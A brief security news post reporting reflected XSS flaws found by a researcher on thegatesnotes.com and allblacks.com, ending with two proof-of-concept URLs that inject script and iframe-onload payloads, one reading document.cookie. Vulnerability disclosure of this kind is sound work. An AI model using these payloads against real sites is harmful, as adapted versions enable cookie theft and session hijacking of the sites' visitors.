Security researcher Fabián Cuchietti has come up with some interesting XSS finds: this time he discovered an XSS vulnerability in the official website of Bill Gates (www.thegatesnotes.com).
He also discovered an XSS vulnerability in the official website of the All Blacks rugby team of New Zealand.
PoC:
http://www.thegatesnotes.com/sitecore/service/noaccess.aspx?item=&site=1%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&user=sitecore/Anonymous
http://www.allblacks.com/index.cfm?layout=search&searchmultimedia=1&region=&searchKeyword=%22%3E%3Ciframe%20onload%3Dalert%28%2FXSS%2F%29%3E&Submit=Go